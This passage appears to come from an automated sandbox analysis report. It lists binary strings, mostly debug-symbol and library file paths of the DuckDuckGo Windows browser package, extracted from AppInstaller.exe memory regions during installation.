Source: Binary string: /WindowsBrowser/DuckDuckGo.WebView.WebView2.dll/WINDOWSBROWSER/DUCKDUCKGO.VPN.TRAY.DEPS.JSON/WINDOWSBROWSER/DUCKDUCKGO.CRASHREPORTER.EXE/WINDOWSBROWSER/GRPC.ASPNETCORE.SERVER.DLL.dll/WINDOWSBROWSER/MESSAGEPACK.ANNOTATIONS.DLLDLL/WINDOWSBROWSER/DUCKDUCKGO.WEBVIEW.WEBVIEW2.DLL/WindowsBrowser/DuckDuckGo.runtimeconfig.json/WindowsBrowser/WindowsBrowser.Burning.pdb/WINDOWSBROWSER/GRPC.NET.CLIENTFACTORY.DLL.dll/WINDOWSBROWSER/MICROSOFT.BCL.TIMEPROVIDER.DLL source: AppInstaller.exe, 00000008.00000002.3034535563.0000019EC9870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: iew2.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: r.pdb source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.NetworkProtection.pdbsononP source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.SecureStorage.pdbWindowsBrowser/DuckDuckGo.Updater.pdbpdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.UserPreferences.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.CRASHHANDLER.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.NetworkProtection.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.VPN.Tray.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Autocomplete.pdb/WINDOWSBROWSER/WINDOWSBROWSER.COMMON.WPF.PDB/WINDOWSBROWSER/WINDOWSBROWSER.COMMON.WPF.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: N.PDB source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.COMMON.WPF.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R/WindowsBrowser/WindowsBrowser.Styles.pdbR/WindowsBrowser/WindowsBrowser.Common.pdbP/WindowsBrowser/System.Text.Encoding.dllV/WindowsBrowser/System.ServiceModel.Web.dllV/WindowsBrowser/WebView2/learning_tools.dllN/WindowsBrowser/WebView2/Locales/sr.pakN/WindowsBrowser/WebView2/Locales/ta.pak/WindowsBrowser/Typography.GlyphLayout.dll source: AppInstaller.exe, 00000008.00000002.3030813390.0000019EC9258000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/Vanara.PInvoke.Cryptography.dllL/WindowsBrowser/WebView2/concrt140.dllL/WindowsBrowser/DuckDuckGo.Windows.pdbin source: AppInstaller.exe, 00000008.00000002.3031199453.0000019EC92D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.WEBVIEW.PDB/WindowsBrowser/DuckDuckGo.Updater.pdbWindowsBrowser/DuckDuckGo.PersonalInfoRemoval.runtimeconfig.jsonS.PDB source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Burning.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.UPDATER.RUNTIMECONFIG.JSON/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.dll/WINDOWSBROWSER/WINDOWSBROWSER.USERPREFERENCES.PDB/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.RUNTIMECONFIG.JSON/WINDOWSBROWSER/DUCKDUCKGO.VPN.TRAY.RUNTIMECONFIG.JSON/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.exeon source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Autocomplete.Public.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Autocomplete.Public.pdbWindowsBrowser/WindowsBrowser.UserPreferences.Public.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /IMAGES/SQUARE44X44LOGO.ALTFORM-UNPLATED_TARGETSIZE-16.PNG.png/WindowsBrowser/WindowsBrowser.DataBrokerProtection.Shared.pdb/IMAGES/SQUARE44X44LOGO.ALTFORM-LIGHTUNPLATED_TARGETSIZE-16.PNG/Images/Square44x44Logo.altform-unplated_targetsize-256.png/IMAGES/SQUARE44X44LOGO.ALTFORM-UNPLATED_TARGETSIZE-256.PNG/WINDOWSBROWSER/DUCKDUCKGO.PERSONALINFOREMOVAL.DEPS.JSONonDB/WINDOWSBROWSER/DUCKDUCKGO.PERSONALINFOREMOVAL.DEPS.JSON/WindowsBrowser/Grpc.AspNetCore.Server.ClientFactory.dllD.PDB source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: j/WindowsBrowser/System.Security.Cryptography.Pkcs.dlln/WindowsBrowser/Microsoft.AspNetCore.SignalR.Common.dlll/WindowsBrowser/ja/PresentationFramework.resources.dllh/WindowsBrowser/Microsoft.AspNetCore.HttpLogging.dlll/WindowsBrowser/de/PresentationFramework.resources.dllj/WindowsBrowser/Microsoft.AspNetCore.WebUtilities.dllh/WindowsBrowser/System.Security.Cryptography.Xml.dllt/WindowsBrowser/System.Runtime.CompilerServices.Unsafe.dllp/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.deps.jsonp/WindowsBrowser/fr/WindowsFormsIntegration.resources.dlll/WindowsBrowser/ko/PresentationFramework.resources.dlll/WindowsBrowser/Microsoft.Extensions.Identity.Core.dlll/WindowsBrowser/cs/PresentationFramework.resources.dlll/WindowsBrowser/ru/PresentationFramework.resources.dllh/WindowsBrowser/WindowsBrowser.NetworkProtection.pdb source: AppInstaller.exe, 00000008.00000002.3031891318.0000019EC9443000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.COMMON.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Styles.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.WebView.WebView2.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.DataBrokerProtection.pdb/WINDOWSBROWSER/WINDOWSBROWSER.CRASHREPORTING.PDBN.PDB/WINDOWSBROWSER/WINDOWSBROWSER.CRASHREPORTING.PDB/WindowsBrowser/WindowsBrowser.Autocomplete.Public.xml/WindowsBrowser/WindowsBrowser.Autocomplete.Public.pdb/WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PUBLIC.XML source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @/WindowsBrowser/Images/EDark.png</WindowsBrowser/DuckDuckGo.pdb/d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundle source: AppInstaller.exe, 00000008.00000002.3031987702.0000019EC946B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.PRIVACY.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.WebView.pdb source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Common.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Burning.pdbBdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.PRIVACY.PDB/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.DEPS.JSONdb source: AppInstaller.exe, 00000008.00000002.3034535563.0000019EC9870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.DataBrokerProtection.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.WebView.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.pdb/WINDOWSBROWSER/DBGX.UTIL.DLL source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PUBLIC.PDB/WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PUBLIC.PDB/WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PUBLIC.PDB/WindowsBrowser/DuckDuckGo.VPN.Tray.runtimeconfig.json source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Styles.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.UserPreferences.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.CrashReporting.pdbN.PDBWindowsBrowser/WindowsBrowser.Autocomplete.Public.xml source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.PDB source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /Images/Wide310x150Logo.scale-400.png/IMAGES/WIDE310X150LOGO.SCALE-100.PNG/Images/Wide310x150Logo.scale-150.png/IMAGES/WIDE310X150LOGO.SCALE-150.PNG/Images/Square44x44Logo.scale-200.png/IMAGES/WIDE310X150LOGO.SCALE-125.PNG/Images/Wide310x150Logo.scale-125.png/IMAGES/WIDE310X150LOGO.SCALE-125.PNG/IMAGES/WIDE310X150LOGO.SCALE-150.PNG/IMAGES/WIDE310X150LOGO.SCALE-125.PNG/Images/Wide310x150Logo.scale-100.png/Images/Wide310x150Logo.scale-200.png/WINDOWSBROWSER/DUCKDUCKGO.WEBVIEW.PDB/WindowsBrowser/DuckDuckGo.Windows.pdb/WINDOWSBROWSER/THEMES/LIGHT.XAML/WINDOWSBROWSER/DUCKDUCKGO.WINDOWS.PDB source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PDB Rj source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Autocomplete.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Common.pdb/WINDOWSBROWSER/WINDOWSBROWSER.COMMON.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.BOOKMARKS.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: l/WindowsBrowser/WindowsBrowser.Autocomplete.Public.pdbr/WindowsBrowser/WindowsBrowser.UserPreferences.Public.pdb/WindowsBrowser/de/Microsoft.Win32.TaskScheduler.resources.dll source: AppInstaller.exe, 00000008.00000002.3030813390.0000019EC926A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: IC.PDB source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.DataBrokerProtection.pdb/WINDOWSBROWSER/WINDOWSBROWSER.DATABROKERPROTECTION.PDB/WindowsBrowser/WindowsBrowser.Autocomplete.Public.pdb/WindowsBrowser/WindowsBrowser.SecureStorage.pdbc.pdb source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.CrashReporter.pdbDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R.PDB source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.NetworkProtection.pdbg.json source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Autocomplete.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.PDB/WindowsBrowser/DbgX.dll source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.CrashHandler.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/THEMES/DARK.XAML/WINDOWSBROWSER/THEMES/LIGHT.XAMLPNG/WindowsBrowser/DuckDuckGo.WebView.pdb/WindowsBrowser/DuckDuckGo.deps.jsonb/WINDOWSBROWSER/DBGX.INTERFACES.DLL/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.DLL/WindowsBrowser/DbgX.Interfaces.dll/WINDOWSBROWSER/DUCKDUCKGO.VPN.TRAY.PDB/WINDOWSBROWSER/DUCKDUCKGO.DEPS.JSONB/WindowsBrowser/DbgX.Interfaces.dllDB/WindowsBrowser/DuckDuckGo.Updater.dll/WindowsBrowser/DuckDuckGo.deps.json/WindowsBrowser/DbgX.Interfaces.dlldb/WindowsBrowser/DuckDuckGo.Updater.exe/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.EXE/WindowsBrowser/DuckDuckGo.WebView.dll/WindowsBrowser/DuckDuckGo.WebView.dll/WINDOWSBROWSER/DUCKDUCKGO.VPN.TRAY.DLL/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.DLL/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.PDB/WINDOWSBROWSER/DUCKDUCKGO.DEPS.JSON/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.EXE/WindowsBrowser/DuckDuckGo.Updater.pdb/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.PDB/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.PDB/WindowsBrowser/DuckDuckGo.VPN.Tray.dll/WINDOWSBROWSER/DBGX.INTERFACES.DLL/WindowsBrowser/DuckDuckGo.deps.jsonB/WINDOWSBROWSER/DUCKDUCKGO.DEPS.JSONB/WINDOWSBROWSER/DBGX.INTERFACES.DLLb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.DataBrokerProtection.Shared.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Privacy.pdb/WINDOWSBROWSER/WINDOWSBROWSER.PRIVACY.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.CRASHREPORTER.PDBP source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dbWindowsBrowser/NetworkProtection.Grpc.pdbmWindowsBrowser/WindowsBrowser.Autocomplete.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 2.PDB source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Burning.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Styles.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Shared.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.WebView.WebView2.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.CRASHREPORTER.PDBb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.Windows.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .SHARED.PDB source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
